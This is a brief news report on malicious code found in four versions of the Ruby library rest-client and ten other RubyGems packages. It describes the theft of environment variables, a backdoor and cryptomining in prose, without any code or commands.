The malicious code was discovered yesterday inside four versions of rest-client, an extremely popular Ruby library.
Dutch Ruby developer Jan Dintel said that the malicious code found in rest-client would collect and send the URL and environment variables of a compromised system to a remote server in Ukraine.
Depending on your setup this can include credentials of services that you use. for example database, payment service provider, Dintel said.
The code contained a backdoor mechanism that allowed the attacker to send a cookie file back to a compromised project, and allow the attacker to execute malicious commands. A subsequent investigation by the RubyGems staff discovered that this mechanism was being abused to insert cryptocurrency mining code.
RubyGems staff also uncovered similar code in 10 other projects. All the libraries, except rest-client, were created by taking another fully functional library, adding the malicious code, and then re-uploading it on RubyGems under a new name. All in all, all the 18 malicious library versions only managed to amass 3,584 downloads before being removed from RubyGems.